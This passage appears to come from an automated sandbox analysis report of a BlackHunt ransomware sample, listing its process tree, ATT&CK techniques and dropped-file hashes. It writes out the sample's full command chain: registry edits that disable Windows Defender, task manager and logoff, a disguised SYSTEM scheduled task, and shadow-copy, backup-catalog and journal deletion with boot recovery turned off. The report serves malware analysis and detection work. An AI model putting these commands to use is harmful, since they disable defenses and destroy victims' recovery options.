- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:4172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3896
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3008
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3368
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵
- Modifies registry class
PID:4172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:4408
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:704
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4952
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2316
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4440
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2492
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2248
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:5096
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:5044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:908
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:904
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1936
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe" /F2⤵PID:2852
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe" /F3⤵
- Creates scheduled task(s)
PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:5008
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1232
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:920
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3836
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3744
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4236
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4068
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1228
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3896
-
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3272
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3720
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5716
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:5372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1520
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:5248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2080
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5600
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1168
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1972
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:4720
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD526e6e9b75cf587c7aa391503a3350b25
SHA1115db87e7334d35c74bec58348fc1c9368df7641
SHA25689855571172f41a791d67a24707c091c55d1d011b0b9ee4bdbf604aaa01de8a7
SHA512f3d457c0a52a84f980abadfa101120859ce16b8fa3e2eaa3ad5b4ebee8f32b1dea64bcb3c0ecaa983a482e52dc3fda002aa4a295c2a603d012070ad11787be7f
-
Filesize
12KB
MD57eddbdea8160ff28d1707b4f92f3e364
SHA10bc6b34b5e5f0c2d557f59ec6f666523d56f0bcd
SHA256c34afaa7839d838724b0a16d61dadcf3edfa17ffd625d27018d4eafc183aa50e
SHA512cc45cfaaa6638eb3207b186a4cd030b01cfbedb2e4990da7b340d97ad21b6c4fdc4467433aaca845f56962a35a99e8bc55c5267f29f6e5f80acc47800a087393
-
Filesize
684B
MD5405615e0a8ea0cf67a0526c41b75718f
SHA14b801df567e450d104e174807caef5746b718db8
SHA25629c0f1d6b537fc9f4e5cd10ad98dc57169ee7a901b64ca071efbfeb256af1e3e
SHA5129f8da27bdda5e26ac36b395c5d60fb21dfc4502f04307a78990ebf771b17c8815db4a5e823da7646463c1ab4c666afb48db901b8bc0867cd6983ed7a98b206ab